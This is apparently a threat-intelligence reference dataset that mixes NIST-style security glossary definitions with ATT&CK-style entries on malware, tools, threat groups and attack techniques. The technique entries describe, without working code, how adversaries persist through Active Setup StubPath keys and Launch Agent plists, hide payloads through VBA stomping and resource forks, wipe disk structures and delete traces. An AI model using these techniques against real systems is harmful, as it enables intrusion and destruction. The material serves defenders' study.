Description: Impacket is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. Impacket contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.

Name: Cachedump
Type: tool
Description: Cachedump is a publicly-available tool that program extracts cached password hashes from a system’s registry.

Term: Equivalent Process
Definition: Two processes are equivalent if the same output is produced when the same values are input to each process (either as input parameters, as values made available during the process, or both).

Term: Stateless Inspection
Definition: See “Packet Filtering”.

Term: Designated Accrediting Authority
Definition: Synonymous with designated accrediting authority (DAA).

Term: key management
Definition: The activities involving the handling of cryptographic keys and other related security parameters (e.g., counters) during the entire life cycle of the keys, including the generation, storage, establishment, entry and output, and destruction.

Term: non-deterministic noise
Definition: A random value that cannot be predicted.

Term: cryptographic solution
Definition: The generic term for a cryptographic device, COMSEC equipment, or combination of such devices/equipment containing either a classified algorithm or an unclassified algorithm.

Name: File Deletion
Type: attack-pattern
Description: Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples of built-in Command and Scripting Interpreter functions include <code>del</code> on Windows, <code>rm</code> or <code>unlink</code> on Linux and macOS, and `rm` on ESXi.

Term: organization-defined control parameter
Definition: See organization-defined control parameter.

Term: CE
Definition: A method of Sanitization in which the Media Encryption Key(MEK) for the encryptedTarget Data (or the KeyEncryption Key–KEK) is sanitized, making recovery of the decrypted Target Data infeasible.

Term: telemetry
Definition: The science of measuring a quantity or quantities, transmitting the results to a distant station, and interpreting, indicating, and/or recording the quantities measured.

Term: key establishment
Definition: A procedure, conducted by two or more participants, after which the resultant keying material is shared by all participants.

Term: authenticate
Definition: Security measure designed to establish the validity of a transmission, message, or originator, or a means of verifying an individual's authorization to receive specific categories of information.

Name: Manjusaka
Type: malware
Description: Manjusaka is a Chinese-language intrusion framework, similar to Sliver and Cobalt Strike, with an ELF binary written in GoLang as the controller for Windows and Linux implants written in Rust. First identified in 2022, Manjusaka consists of multiple components, only one of which (a command and control module) is freely available.

Term: information system security plan
Definition: Formal document that provides an overview of the security requirements for an information system and describes the security controls in place or planned for meeting those requirements.

Term: assessment plan
Definition: The objectives for the security and privacy control assessments and a detailed roadmap of how to conduct such assessments.

Name: Malicious Image
Type: attack-pattern
Description: Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via Upload Malware, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.

Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: Match Legitimate Resource Name or Location).

Name: cd00r
Type: malware
Description: cd00r is an open-source backdoor for UNIX and UNIX-variant operating systems that was orginally released in 2000. cd00r source code is primarily based on a packet-capturing program as it utilizes a sniffer to listen for specific sequences of network traffic or "secret knock" before executing the attacker's code.

Term: Key wrapping
Definition: In this Recommendation, key-wrapping is a method of protecting keying material using a symmetric-key-based authenticated encryption method, such as a block cipher key-wrapping mode specified in [NIST SP 800-38F] that provides both confidentiality and integrity protection.

Name: FruitFly
Type: malware
Description: FruitFly is designed to spy on mac users .

Term: IoT Product Developer
Definition: The entity that creates an assembled final IoT product. Some cybersecurity outcomes may be supported by the IoT product developer’s suppliers or other contracted third-parties with support responsibilities related to the IoT product or its components.

Term: Trust Framework Providers
Definition: See Federation Administrators.

Term: malware
Definition: Software or firmware intended to perform an unauthorized process that will have an adverse impact on the confidentiality, integrity, or availability of a system. A virus, worm, Trojan horse, or other code-based entity that infects a host. Spyware and some forms of adware are also examples of malicious code.

Term: RC
Definition: Develop and implement the appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity event.

Term: configuration baseline
Definition: A documented set of specifications for an information system, or a configuration item within a system, that has been formally reviewed and agreed on at a given point in time, and which can be changed only through change control procedures.

Term: <em>dP</em>
Definition: RSA private exponent for the prime factor p in the CRT format, i.e., d mod (p - 1); an integer.

Term: Similarity
Definition: The similarity of two artifacts, as measured by a particular approximate matching algorithm, is defined as an increasing monotonic function of the number of matching features contained in their respective feature sets.

Term: SSH Server
Definition: A software implementation that enables SSH access to a system from SSH clients. SSH server may be included with an operating system or appliance or may be add-on software. An SSH server is typically a complex set of software modules responsible for a broad number of tasks, including enforcing configured SSH settings, authenticating users, limiting access to certain users and groups, ensuring secure connections, interfacing with other systems (e.g., PAM and Kerberos), performing file transfers, etc.

Term: organization-defined parameter
Definition: See assignment operation and selection operation.

Term: security control assessment
Definition: The testing and/or evaluation of the management, operational, and technical security controls in a system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.

Term: privacy control assessment
Definition: The assessment of privacy controls to determine whether the controls are implemented correctly, operating as intended, and sufficient to ensure compliance with applicable privacy requirements and manage privacy risks. A privacy control assessment is both an assessment and a formal document detailing the process and the outcome of the assessment.

Term: Security testing
Definition: Testing that attempts to verify that an implementation protects data and maintains functionality as intended.

Term: CA
Definition: 2. The study of mathematical techniques for attempting to defeat cryptographic techniques and information system security. This includes the process of looking for errors or weaknesses in the implementation of an algorithm or in the algorithm itself.

Term: precursor
Definition: A sign that an attacker may be preparing to cause an incident. 
See indicator.

Term: Digest
Definition: Output of a hash function or XOF.

Term: network
Definition: An open communications medium, typically the Internet, used to transport messages between the claimant and other parties. Unless otherwise stated, no assumptions are made about the network’s security; it is assumed to be open and subject to active (e.g., impersonation, man-in-the-middle, session hijacking) and passive (e.g., eavesdropping) attack at any point between the parties (e.g., claimant, verifier, CSP, RP).

Term: Forward Channel
Definition: The channel on which a reader transmits its signals.

Term: Authority Type
Definition: Type of organization that lends its authority to the checklist. The three types are Governmental Authority, Software Vendor, and Third Party (e.g., security organizations).

Name: spwebmember
Type: tool
Description: spwebmember is a Microsoft SharePoint enumeration and data dumping tool written in .NET.

Term: Target Profile
Definition: the desired outcome or ‘to be’ state of cybersecurity implementation

Term: Target
Definition: The set of specific IT systems or applications for which a checklist has been created.

Term: SCA
Definition: An attack enabled by leakage of information from a physical cryptosystem. Characteristics that could be exploited in a side-channel attack include timing, power consumption, and electromagnetic and acoustic emissions.

Term: AC
Definition: Process of granting access to information system resources only to authorized users, programs, processes, or other systems.

Term: Shadow Stack
Definition: A parallel hardware stack that applications can utilize to store a copy of return addresses that are checked against the normal program stack on return operations.

Term: Individual
Definition: A single person or a group of persons, including at a societal level.

Term: system of records
Definition: A group of any records under the control of any agency from which information is retrieved by the name of the individual or by some identifying number, symbol, or other identifying particular assigned to the individual.

Term: impact value
Definition: The assessed potential impact resulting from a compromise of the confidentiality, integrity, or availability of an information type, expressed as a value of low, moderate, or high.

Term: PI
Definition: information with the purpose of uniquely identifying a person within a given context

Term: Semi-Active Tag
Definition: A tag that uses a battery to communicate but remains dormant until a reader sends an energizing signal. Semi-active tags have a longer range than passive tags and a longer battery life than active tags.

Term: RAR
Definition: The report which contains the results of performing a risk assessment or the formal output from the process of assessing risk.

Term: FIPS
Definition: A standard for adoption and use by federal departments and agencies that has been developed within the Information Technology Laboratory and published by NIST, a part of the U.S. Department of Commerce. A FIPS covers some topic in information technology to achieve a common level of quality or some level of interoperability.

Name: Active Setup
Type: attack-pattern
Description: Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer. These programs will be executed under the context of the user and will have the account's associated permissions level.

Adversaries may abuse Active Setup by creating a key under <code> HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.

Term: Rationale
Definition: The explanation for why a Reference Document element and a Focal Document element are related. This will be one of the following: Syntactic, Semantic, or Functional.

Name: NICECURL
Type: malware
Description: NICECURL is a VBScript-based backdoor used by APT42 to download additional modules.

Term: ACL
Definition: A mechanism that implements access control for a system resource by enumerating the system entities that are permitted to access the resource and stating, either implicitly or explicitly, the access modes granted to each entity.

Term: secret key
Definition: A cryptographic key used by one or more (authorized) entities in a symmetric-key cryptographic algorithm; the key is not made public.

Term: Surge Protector
Definition: A device designed to protect electrical devices from voltage spikes or dips.

Name: Launch Agent
Type: attack-pattern
Description: Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in <code>/System/Library/LaunchAgents</code>, <code>/Library/LaunchAgents</code>, and <code>~/Library/LaunchAgents</code>. Property list files use the <code>Label</code>, <code>ProgramArguments </code>, and <code>RunAtLoad</code> keys to identify the Launch Agent's name, executable location, and execution time. Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.

 Launch Agents can also be executed using the Launchctl command.
 
Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the <code>RunAtLoad</code> or <code>KeepAlive</code> keys set to <code>true</code>. The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.

Term: digital signature
Definition: An asymmetric key operation where the private key is used to digitally sign data and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation, but not confidentiality protection.

Term: non-discretionary access control
Definition: An access control policy that is uniformly enforced across all subjects and objects within the boundary of an information system. A subject that has been granted access to information is constrained from doing any of the following: (i) passing the information to unauthorized subjects or objects; (ii) granting its privileges to other subjects; (iii) changing one or more security attributes on subjects, objects, the information system, or system components; (iv) choosing the security attributes to be associated with newly-created or modified objects; or (v) changing the rules governing access control. Organization-defined subjects may explicitly be granted organization-defined privileges (i.e., they are trusted subjects) such that they are not limited by some or all of the above constraints.

Name: ShadowRay
Type: campaign
Description: ShadowRay was a campaign that began in late 2023 targeting the education, cryptocurrency, biopharma, and other sectors through a vulnerability (CVE-2023-48022) in the Ray AI framework named ShadowRay. According to security researchers ShadowRay was the first known instance of AI workloads being activley exploited in the wild through vulnerabilities in AI infrastructure. CVE-2023-48022, which allows access to compute resources and sensitive data for exposed instances, remains unpatched and has been disputed by the vendor as they maintain that Ray is not intended for use outside of a strictly controlled network environment.

Term: advanced persistent threat
Definition: An adversary or collection of adversaries collaborating, opportunistically overlapping, or inadvertently converging that uses multiple attack vectors to achieve their objectives, including cyber, physical, and deception. Such adversaries use tactics, techniques, and procedures that display sophisticated levels of expertise and significant resources to achieve their objectives. These objectives typically include establishing and extending footholds within the IT infrastructure of the targeted organizations for purposes of exfiltrating information; undermining or impeding critical aspects of a mission, program, or organization; or positioning itself to carry out these objectives in the future. The advanced persistent threat pursues its objectives repeatedly over an extended period, adapts to defenders’ efforts to resist it, and is determined to maintain the level of interaction needed to execute its objectives.

Term: public key cryptography (PKC)
Definition: A cryptographic system where users have a private key that is kept secret and used to generate a public key (which is freely provided to others). Users can digitally sign data with their private key and the resulting signature can be verified by anyone using the corresponding public key. Also known as a Public-key cryptography.

Term: counterfeit
Definition: An unauthorized copy or substitute that has been identified, marked, and/or altered by a source other than the item's legally authorized source and has been misrepresented to be an authorized item of the legally authorized source.

Term: Seed
Definition: A secret value that is used to initialize a process (e.g., a DRBG). Also see RBG seed.

Name: PoisonIvy
Type: malware
Description: PoisonIvy is a popular remote access tool (RAT) that has been used by many groups.

Term: eBGP
Definition: A BGP operation communicating routing information between two or more ASes.

Term: Mode of Operation (Mode)
Definition: An algorithm for the cryptographic transformation of data that features a symmetric key block cipher algorithm.

Term: Second preimage
Definition: A message X’, that is different from a given message X , such that its message digest is the same as the known message digest of X.

Name: Disk Structure Wipe
Type: attack-pattern
Description: Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table. The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. Disk Structure Wipe may be performed in isolation, or along with Disk Content Wipe if all sectors of a disk are wiped.

On a network devices, adversaries may reformat the file system using Network Device CLI commands such as `format`.

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.

Term: characterization
Definition: An extended test of the performance characteristics of a clock or oscillator. A characterization involves more work than a typical calibration. The device under test is usually measured for a long period of time (days or weeks), and sometimes, a series of measurements is made under different environmental conditions. A characterization is often used to determine the types of noise that limit the uncertainty of the measurement and the sensitivity of the device to environmental changes.

Term: data consumer
Definition: In a trust model for differential privacy, the data consumers are those who receive differentially private results.

Term: domain
Definition: A domain within which behaviors, interactions, and outcomes occur and that is defined by a governing security policy. 
Note: A security domain is defined by rules for users, processes, systems, and services that apply to activity within the domain and activity with similar entities in other domains.

Name: Malicious Library
Type: attack-pattern
Description: Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may Upload Malware to package managers such as NPM and PyPi, as well as to public code repositories such as GitHub. User may install libraries without realizing they are malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency.

In some cases, threat actors may compromise and backdoor existing popular libraries (i.e., Compromise Software Dependencies and Development Tools). Alternatively, they may create entirely new packages and leverage behaviors such as typosquatting to encourage users to install them.

Term: Local Vulnerability Prevalence
Definition: measures the prevalence of vulnerable systems in a specific environment.

Term: control baseline
Definition: Predefined sets of controls specifically assembled to address the protection needs of groups, organizations, or communities of interest. See privacy control baseline or security control baseline.

Term: sensitive information
Definition: Information, the loss, misuse, or unauthorized access to or modification of, that could adversely affect the national interest or the conduct of federal programs, or the privacy to which individuals are entitled under 5 U.S.C. Section 552a (the Privacy Act), but that has not been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy.

Term: Resource pooling
Definition: The provider’s computing resources are pooled to serve multiple consumers using a multi-tenant model, with different physical and virtual resources dynamically assigned and reassigned according to consumer demand. There is a sense of location independence in that the customer generally has no control or knowledge over the exact location of the provided resources but may be able to specify location at a higher level of abstraction (e.g., country, state, or datacenter). Examples of resources include storage, processing, memory, and network bandwidth.

Term: BGPsec Input-Output
Definition: BGPsec Input-Output (BIO) enables the generation and storage of precomputed reproducible BGPsec traffic for testing purposes.

Name: Modify Cloud Compute Infrastructure
Type: attack-pattern
Description: An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.

Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.

Term: Key management planning documentation
Definition: The Key Management Specification, CKMS Security Policy and CKMS Practice Statement

Name: Janicab
Type: malware
Description: Janicab is an OS X trojan that relied on a valid developer ID and oblivious users to install it.

Term: KEM
Definition: A set of three cryptographic algorithms: KeyGen (key generation), Encaps (encapsulation), and Decaps (decapsulation). These algorithms can be used by two parties to securely establish a shared secret key over a public channel.

Name: Pikabot
Type: malware
Description: Pikabot is a backdoor used for initial access and follow-on tool deployment active since early 2023. Pikabot is notable for extensive use of multiple encoding, encryption, and defense evasion mechanisms to evade defenses and avoid analysis. Pikabot has some overlaps with QakBot, but insufficient evidence exists to definitively link these two malware families. Pikabot is frequently used to deploy follow on tools such as Cobalt Strike or ransomware variants.

Term: Autonomous System (AS)
Definition: An Autonomous System specifies a network, mostly an organization that can own or announce network addresses to the Internet.

Term: bit string
Definition: An ordered sequence of zeros and ones. The leftmost bit is the most significant bit of the string. The rightmost bit is the least significant bit of the string.

Name: Limit Software Installation
Type: course-of-action
Description: Prevent users or groups from installing unauthorized or unapproved software to reduce the risk of introducing malicious or vulnerable applications. This can be achieved through allowlists, software restriction policies, endpoint management tools, and least privilege access principles. This mitigation can be implemented through the following measures:

Application Whitelisting

- Implement Microsoft AppLocker or Windows Defender Application Control (WDAC) to create and enforce allowlists for approved software.
- Whitelist applications based on file hash, path, or digital signatures.

Restrict User Permissions

- Remove local administrator rights for all non-IT users.
- Use Role-Based Access Control (RBAC) to restrict installation permissions to privileged accounts only.

Software Restriction Policies (SRP)

- Use GPO to configure SRP to deny execution of binaries from directories such as `%AppData%`, `%Temp%`, and external drives.
- Restrict specific file types (`.exe`, `.bat`, `.msi`, `.js`, `.vbs`) to trusted directories only.

Endpoint Management Solutions

- Deploy tools like Microsoft Intune, SCCM, or Jamf for centralized software management.
- Maintain a list of approved software, versions, and updates across the enterprise.

Monitor Software Installation Events

- Enable logging of software installation events and monitor Windows Event ID 4688 and Event ID 11707 for software installs.
- Use SIEM or EDR tools to alert on attempts to install unapproved software.

Implement Software Inventory Management

- Use tools like OSQuery or Wazuh to scan for unauthorized software on endpoints and servers.
- Conduct regular audits to detect and remove unapproved software.

*Tools for Implementation*

Application Whitelisting:

- Microsoft AppLocker
- Windows Defender Application Control (WDAC)

Endpoint Management:

- Microsoft Intune
- SCCM (System Center Configuration Manager)
- Jamf Pro (macOS)
- Puppet or Ansible for automation

Software Restriction Policies:

- Group Policy Object (GPO)
- Microsoft Software Restriction Policies (SRP)

Monitoring and Logging:

- Splunk
- OSQuery
- Wazuh (open-source SIEM and XDR)
- EDRs

Inventory Management and Auditing:

- OSQuery
- Wazuh

Term: information environment
Definition: The aggregate of individuals, organizations, and systems that collect, process, disseminate, or act on information.

Term: H.323
Definition: The International Telecommunications Union (ITU) standard for packet-switched network voice and video calling and signaling.

Term: Algorithm originator-usage period
Definition: The period of time during which a specific cryptographic algorithm may be used by originators to apply protection to data.

Term: INFOSEC
Definition: The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability.

Name: Lateral Tool Transfer
Type: attack-pattern
Description: Adversaries may transfer tools or other files between systems in a compromised environment. Once brought into the victim environment (i.e., Ingress Tool Transfer) files may then be copied from one system to another to stage adversary tools or other files over the course of an operation.

Adversaries may copy files between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authenticated connections via Remote Desktop Protocol.

Files can also be transferred using native or otherwise present tools on the victim system, such as scp, rsync, curl, sftp, and ftp. In some cases, adversaries may be able to leverage Web Services such as Dropbox or OneDrive to copy files from one machine to another via shared, automatically synced folders.

Term: Log Normalization
Definition: Converting each log data field to a particular data representation and categorizing it consistently.

Name: Container Administration Command
Type: attack-pattern
Description: Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.

In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as <code>docker exec</code> to execute a command within a running container. In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as <code>kubectl exec</code>.

Term: records
Definition: All books, papers, maps, photographs, machine-readable materials, or other documentary materials, regardless of physical form or characteristics, made or received by an agency of the United States Government under Federal law or in connection with the transaction of public business and preserved or appropriate for preservation by that agency or its legitimate successor as evidence of the organization, functions, policies, decisions, procedures, operations or other activities of the Government or because of the informational value of the data in them.

Term: Capability, Manage and Assess Risk
Definition: The program and supporting processes to manage information security risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, and includes: (i) establishing the context for risk-related activities; (ii) assessing risk; (iii) responding to risk once determined; and (iv) monitoring risk over time.

Name: Shared Modules
Type: attack-pattern
Description: Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API).

Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.

The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.

The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows Native API which is called from functions like `LoadLibrary` at run time.

Term: System Assurance
Definition: The justified confidence that the system functions as intended and is free of exploitable vulnerabilities, either intentionally or unintentionally designed or inserted as part of the system at any time during the life cycle.

Term: Secure Sockets Layer (SSL)
Definition: A security protocol providing privacy and data integrity between two communicating applications. The protocol is composed of two layers: the TLS Record Protocol and the TLS Handshake Protocol.

Term: protection needs
Definition: Informal statement or expression of the stakeholder security requirements focused on protecting information, systems, and services associated with mission/business functions throughout the system life cycle. 
Note: Requirements elicitation and security analyses transform the protection needs into a formalized statement of stakeholder security requirements that are managed as part of the validated stakeholder requirements baseline.

Term: Entropy Source
Definition: A physical source of information whose output either appears to be random in itself or by applying some filtering/distillation process. This output is used as input to either a RNG or PRNG.

Term: portable storage device
Definition: A system component that can be inserted into and removed from a system, and that is used to store data or information (e.g., text, video, audio, and/or image data). Such components are typically implemented on magnetic, optical, or solid state devices (e.g., floppy disks, compact/digital video disks, flash/thumb drives, external hard disk drives, and flash memory cards/drives that contain nonvolatile memory).

Name: H1N1
Type: malware
Description: H1N1 is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality.

Term: Random Bit Generator (RBG)
Definition: Random Bit Generator

Name: Scattered Spider
Type: intrusion-set
Description: Scattered Spider is a native English-speaking cybercriminal group active since at least 2022. The group initially targeted customer relationship management (CRM) providers, business process outsourcing (BPO) firms, and telecommunications and technology companies before expanding in 2023 to gaming, hospitality, retail, managed service provider (MSP), manufacturing, and financial sectors. 
Scattered Spider relies heavily on social engineering, including impersonating IT and help-desk staff, to gain initial access, bypass multi-factor authentication (MFA), and compromise enterprise networks. The group has adapted its tooling to evade endpoint detection and response (EDR) defenses and used ransomware for financial gain. 
Scattered Spider had expanded into hybrid cloud and identity environments, using help-desk impersonation and MFA bypass to obtain administrator access in Okta, AWS, and Office 365.

Term: authenticate
Definition: The process of establishing confidence of authenticity; in this case, the validity of a person’s identity and an authenticator (e.g., PIV Card or derived PIV credential).

Term: Trust Framework Operators
Definition: The entity responsible for the governance and administration of an identity federation.

Term: Safety Requirements
Definition: AC properties, business requirements, specifications of expected/unexpected system security features, or directly translation of policy values. Safety requirements can also include privilege inheritance.

Term: facility
Definition: Physical means or equipment for facilitating the performance of an action, e.g., buildings, instruments, tools.

Term: authorize processing
Definition: Access privileges granted to an entity; conveys an “official” sanction to perform a cryptographic function or other sensitive activity.

Term: Risk Response Measure
Definition: A specific action taken to respond to an identified risk.

Term: T(x, l)
Definition: Truncation of the bit string x to the leftmost l bits of x, where l ≤ the length of x in bits

Term: low impact
Definition: The loss of confidentiality, integrity, or availability that could be expected to have a limited adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States (i.e., 1) causes a degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is noticeably reduced; 2) results in minor damage to organizational assets; 3) results in minor financial loss; or 4) results in minor harm to individuals).

Term: Capability, Security
Definition: A set of mutually reinforcing security controls implemented by technical, physical, and procedural means. Such controls are typically selected to achieve a common information security-related purpose.

Term: Message
Definition: Input to the hash function.

Name: Seasalt
Type: malware
Description: Seasalt is malware that has been linked to APT1's 2010 operations. It shares some code similarities with OceanSalt.

Name: WHOIS
Type: attack-pattern
Description: Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.

Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Active Scanning or Phishing for Information), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).

Term: <em>Xi</em>
Definition: For a positive integer i, the ith power of X under the product ‘•’.

Term: Certificate class
Definition: A CA-designation (e.g., "class 0" or "class 1") indicating how thoroughly the CA checked the validity of the certificate. Per X.509 rules, the "class" should be encoded in the certificate as a CP extension: the CA can insert an object identifier (OID) that designates the set of procedures applied for the issuance of the certificate. These OIDs are CA-specific and can be understood only by referring to the CA's Certification Practice Statement.

Term: Vulnerability Management
Definition: An ISCM capability that identifies vulnerabilities [Common Vulnerabilities and Exposures (CVEs)] on devices that are likely to be used by attackers to compromise a device and use it as a platform from which to extend compromise to the network.

Term: Source Value
Definition: A single value that a matching engine compares to a corresponding target value to determine whether or not there is a source-to-target match. Source values include A-V pairs or set relation values (e.g., superset or subset).

Term: WAN
Definition: A physical or logical network that provides data communications to a larger number of independent users than are typically served by a local area network (LAN) and that is usually spread over a larger geographic area than that of a LAN.&nbsp;

Term: negative risk
Definition: Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, or modification of information, and/or denial of service.

Term: replay attack
Definition: An attack in which the Attacker is able to replay previously captured messages (between a legitimate Claimant and a Verifier) to masquerade as that Claimant to the Verifier or vice versa.

Term: (KEM) ciphertext
Definition: A bit string that is produced by encapsulation and used as an input to decapsulation.

Term: service
Definition: A software component participating in a service-oriented architecture that provides functionality or participates in realizing one or more capabilities.

Term: assignment statement
Definition: A control parameter that allows an organization to assign a specific, organization-defined value to the control or control enhancement (e.g., assigning a list of roles to be notified or a value for the frequency of testing). See organization-defined control parameters and selection statement.

Term: system owner (or program manager)
Definition: Official responsible for the overall procurement, development, integration, modification, or operation and maintenance of a system.

Term: senior information security officer (SISO)
Definition: Official responsible for carrying out the Chief Information Officer responsibilities under FISMA and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. 
Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.

Term: Invocation Field
Definition: In the deterministic construction of IVs, the field that identifies the sets of inputs to the authenticated encryption function in a particular device or context.

Term: criticality level
Definition: An attribute assigned to an asset that reflects its relative importance or necessity in achieving or contributing to the achievement of stated goals.

Name: INC Ransom
Type: intrusion-set
Description: INC Ransom is a ransomware and data extortion threat group associated with the deployment of INC Ransomware that has been active since at least July 2023. INC Ransom has targeted organizations worldwide most commonly in the industrial, healthcare, and education sectors in the US and Europe.

Term: firmware
Definition: Software that is included in read-only memory (ROM).

Term: fiscal optimization
Definition: A straightforward ranking of risks in descending order from most impactful to least. Risk managers tally the total risk response costs until funding is exhausted.

Term: information security policy
Definition: Aggregate of directives, regulations, rules, and practices that prescribes how an organization manages, protects, and distributes information.

Term: hash digest
Definition: The result of applying a cryptographic hash function to data (e.g., a message). Also known as a “message digest”.

Term: Deprecated Identifier Name
Definition: An identifier name that is no longer valid because it has either been replaced by a new identifier name or set of identifier names or was created erroneously.

Term: Nonfungible
Definition: Refers to something that is uniquely identifiable (i.e., not replaceable or interchangeable).

Term: Approved security function
Definition: A security function (e.g., cryptographic algorithm, cryptographic key management technique, or authentication technique) that is either 
a) Specified in an Approved standard, 
b) Adopted in an Approved standard and specified either in an appendix of the Approved standard or in a document referenced by the Approved standard, or 
c) Specified in the list of Approved security functions.

Name: VBA Stomping
Type: attack-pattern
Description: Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.

MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.

An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the <code>_VBA_PROJECT</code> stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.

Term: SHA
Definition: A hash algorithm with the property that it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.

Term: Object, Assessment
Definition: The item (specifications, mechanisms, activities, individuals) upon which an assessment method is applied during an assessment.

Name: Resource Forking
Type: attack-pattern
Description: Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code. Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.

Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.

Term: INFOSEC
Definition: The term 'information security' means protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide integrity, confidentiality, and availability.

